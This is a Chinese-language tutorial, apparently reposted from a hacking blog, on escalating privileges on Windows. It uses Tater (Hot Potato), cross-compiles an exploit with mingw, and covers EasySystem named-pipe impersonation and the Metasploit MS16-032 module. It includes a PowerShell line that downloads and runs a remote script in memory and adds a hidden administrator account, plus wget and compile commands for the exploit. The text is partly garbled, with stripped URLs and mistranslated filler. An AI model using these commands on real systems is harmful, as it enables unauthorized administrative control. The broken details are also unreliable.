使用 Tater、Sploits 提升windows权限

使用 Tater、Sploits提升权限

使用 Tater 提升权限

使用 PowerShell 版本的 Hot Potato – Tater,它会立即加载到内存中并且不会在磁盘上留下任何痕迹!你可以在一行中运行该实用程序:

powershell “IEX (New-Object Net.WebClient).DownloadString('1Yd'); Invoke-Tater -Trigger Command “”net user User1 Password1 /add && net localgroup administrators User1 /add”””

之后,用户 User1 将出现在系统中,密码为 Password1,它是 Administrators 组的成员。但需要注意的是,对于 Windows 10,应该使用 -Trigger 2 开关。

在 Kali 中编译Sploits

毫无疑问,用于渗透测试/黑客攻击的主要操作系统是Linux,为它实现了一堆工具,通常很少有人在Windows下破解。默认情况下一切都很好没有访问权限的英文,直到你需要在 Windows 下编译sploit(在我们的例子中,以提高权限)。通过安装 Mingw-w64 解决了这个缺陷:

apt-get update

apt-get install mingw-w64

然后一切都很简单,下载sploit并编译:

wget‐‐output-document= 40564.c

使用 Tater、Sploits 提升windows权限,使用 Tater、Sploits 提升windows权限,第1张

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32

如果你已经有本地管理员并且唯一的问题是如何访问系统,那么你可以查看小的EasySystem实用程序。正如该实用程序的作者所写,这不是一个漏洞利用,而是一个模拟命名管道的“古老而肮脏”的技巧。

Windows 权限提升。EasySystem 和命名管道授予 NT AUTHORITYSYSTEM

在某些情况下,这样的工具可以派上用场。我们不会详述技术细节,如果你有兴趣,可以在此处和此处阅读有关此技术的更多信息。

辅助登录句柄

另一个有趣的技巧涉及使用辅助登录服务。此服务允许你以管理员身份运行程序、Microsoft 管理控制台、控制面板项目,即使当前用户仅属于 Users 或 Power Users 组。底线是该服务在创建新进程时不会清除句柄。

对我们来说重要的是几乎所有版本的 Windows(x32 和 x64)都受到此漏洞的影响:从 Vista 到 Windows 2012 Server。但是有一些限制:要成功提升权限,必须在系统上安装 PowerShell 2.0 或更高版本,并且必须存在两个或更多 CPU 内核。Metasploit框架有一个特殊的模块exploit/windows/local/ms16_032_secondary_logon_handle_privesc。

它的使用意味着我们已经有一个meterpreter会话,我们必须在参数中指定它:设置会话1。好吧,如果操作成功,我们将拥有另一个具有提升权限的会话。

对于相同的漏洞,还有一个PowerShell 脚本可以启动具有系统权限的命令 shell。以及执行相同操作的已编译二进制文件。

顺便说一句没有访问权限的英文,微软发布了一个补丁,所以在尝试提升权限之前,请检查它是否已安装:

C:Userspentestlab>wmic qfe list | find “3139914”

本文到此结束,希望对大家有所帮助!

关于作者:

生活百科常识网